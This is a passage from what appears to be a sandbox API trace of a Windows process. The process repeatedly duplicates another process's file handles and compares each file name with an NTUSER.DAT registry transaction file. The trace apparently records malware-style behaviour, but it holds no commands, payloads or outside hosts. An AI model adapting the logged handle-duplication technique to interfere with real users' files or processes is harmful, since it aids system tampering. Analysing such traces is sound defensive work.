_Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.899] CloseHandle (hObject=0x680) returned 1 [0154.899] CloseHandle (hObject=0x62c) returned 1 [0154.899] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.899] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x654, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.899] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.900] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.900] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.900] CloseHandle (hObject=0x670) returned 1 [0154.901] _wcsicmp (_Str1="\\bthprops.cpl.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0154.901] CloseHandle (hObject=0x680) returned 1 [0154.901] CloseHandle (hObject=0x62c) returned 1 [0154.901] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.901] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x664, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.901] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.902] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.902] CloseHandle (hObject=0x670) returned 1 [0154.903] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.903] CloseHandle (hObject=0x680) returned 1 [0154.903] CloseHandle (hObject=0x62c) returned 1 [0154.903] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.903] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x69c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.903] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.903] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.904] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.904] CloseHandle (hObject=0x670) returned 1 [0154.904] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.904] CloseHandle (hObject=0x680) returned 1 [0154.904] CloseHandle (hObject=0x62c) returned 1 [0154.904] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.904] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.904] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.905] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.906] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.906] CloseHandle (hObject=0x670) returned 1 [0154.906] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.906] CloseHandle (hObject=0x680) returned 1 [0154.906] CloseHandle (hObject=0x62c) returned 1 [0154.906] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.906] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.907] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.908] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.908] CloseHandle (hObject=0x670) returned 1 [0154.908] _wcsicmp (_Str1="\\msctf.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.908] CloseHandle (hObject=0x680) returned 1 [0154.908] CloseHandle (hObject=0x62c) returned 1 [0154.908] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.909] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.909] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.910] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.910] CloseHandle (hObject=0x670) returned 1 [0154.910] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.910] CloseHandle (hObject=0x680) returned 1 [0154.910] CloseHandle (hObject=0x62c) returned 1 [0154.910] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.910] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.911] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.911] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.911] CloseHandle (hObject=0x670) returned 1 [0154.911] CloseHandle (hObject=0x680) returned 1 [0154.911] CloseHandle (hObject=0x62c) returned 1 [0154.911] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.912] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.912] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.912] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.913] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.913] CloseHandle (hObject=0x670) returned 1 [0154.913] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.913] CloseHandle (hObject=0x680) returned 1 [0154.913] CloseHandle (hObject=0x62c) returned 1 [0154.913] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.913] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.914] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.915] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.915] CloseHandle (hObject=0x670) returned 1 [0154.915] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0154.915] CloseHandle (hObject=0x680) returned 1 [0154.915] CloseHandle (hObject=0x62c) returned 1 [0154.915] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.915] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.915] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.916] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.916] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.916] CloseHandle (hObject=0x670) returned 1 [0154.917] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0154.917] CloseHandle (hObject=0x680) returned 1 [0154.917] CloseHandle (hObject=0x62c) returned 1 [0154.917] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.917] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x854, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.918] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.918] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.918] CloseHandle (hObject=0x670) returned 1 [0154.918] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.918] CloseHandle (hObject=0x680) returned 1 [0154.919] CloseHandle (hObject=0x62c) returned 1 [0154.919] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.919] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x87c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.919] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.920] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.920] CloseHandle (hObject=0x670) returned 1 [0154.920] _wcsicmp (_Str1="\\netshell.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -15 [0154.920] CloseHandle (hObject=0x680) returned 1 [0154.920] CloseHandle (hObject=0x62c) returned 1 [0154.920] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.920] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x8ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.921] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.921] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.922] CloseHandle (hObject=0x670) returned 1 [0154.922] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.922] CloseHandle (hObject=0x680) returned 1 [0154.922] CloseHandle (hObject=0x62c) returned 1 [0154.922] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.922] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x950, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.922] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.922] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.923] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.923] CloseHandle (hObject=0x670) returned 1 [0154.923] CloseHandle (hObject=0x680) returned 1 [0154.923] CloseHandle (hObject=0x62c) returned 1 [0154.923] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.923] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x984, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.923] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.924] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.926] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.926] CloseHandle (hObject=0x670) returned 1 [0154.926] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0154.926] CloseHandle (hObject=0x680) returned 1 [0154.927] CloseHandle (hObject=0x62c) returned 1 [0154.927] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.927] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x9f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.927] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.927] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.928] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.928] CloseHandle (hObject=0x670) returned 1 [0154.928] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.928] CloseHandle (hObject=0x680) returned 1 [0154.928] CloseHandle (hObject=0x62c) returned 1 [0154.928] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.928] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.928] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.929] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.929] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.929] CloseHandle (hObject=0x670) returned 1 [0154.929] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.929] CloseHandle (hObject=0x680) returned 1 [0154.930] CloseHandle (hObject=0x62c) returned 1 [0154.930] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.930] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa34, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.930] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.930] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.931] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.931] CloseHandle (hObject=0x670) returned 1 [0154.931] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.931] CloseHandle (hObject=0x680) returned 1 [0154.931] CloseHandle (hObject=0x62c) returned 1 [0154.931] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.931] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.931] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.932] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.933] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.933] CloseHandle (hObject=0x670) returned 1 [0154.933] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.933] CloseHandle (hObject=0x680) returned 1 [0154.933] CloseHandle (hObject=0x62c) returned 1 [0154.933] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.933] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.933] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.934] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.934] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.934] CloseHandle (hObject=0x670) returned 1 [0154.934] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.934] CloseHandle (hObject=0x680) returned 1 [0154.934] CloseHandle (hObject=0x62c) returned 1 [0154.935] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.935] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xae4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.935] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.936] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.936] CloseHandle (hObject=0x670) returned 1 [0154.936] _wcsicmp (_Str1="\\FXSAPIDebugLogFile.txt", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -8 [0154.936] CloseHandle (hObject=0x680) returned 1 [0154.936] CloseHandle (hObject=0x62c) returned 1 [0154.936] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.936] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xaf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.936] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.937] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.937] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.937] CloseHandle (hObject=0x670) returned 1 [0154.937] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.937] CloseHandle (hObject=0x680) returned 1 [0154.937] CloseHandle (hObject=0x62c) returned 1 [0154.937] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.938] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xccc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.938] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.938] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.939] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.939] CloseHandle (hObject=0x670) returned 1 [0154.939] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.939] CloseHandle (hObject=0x680) returned 1 [0154.939] CloseHandle (hObject=0x62c) returned 1 [0154.939] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.939] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.940] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.942] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.942] CloseHandle (hObject=0x670) returned 1 [0154.942] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.942] CloseHandle (hObject=0x680) returned 1 [0154.942] CloseHandle (hObject=0x62c) returned 1 [0154.943] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.943] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd3c, hTargetProcessHandle=0xffffffff, 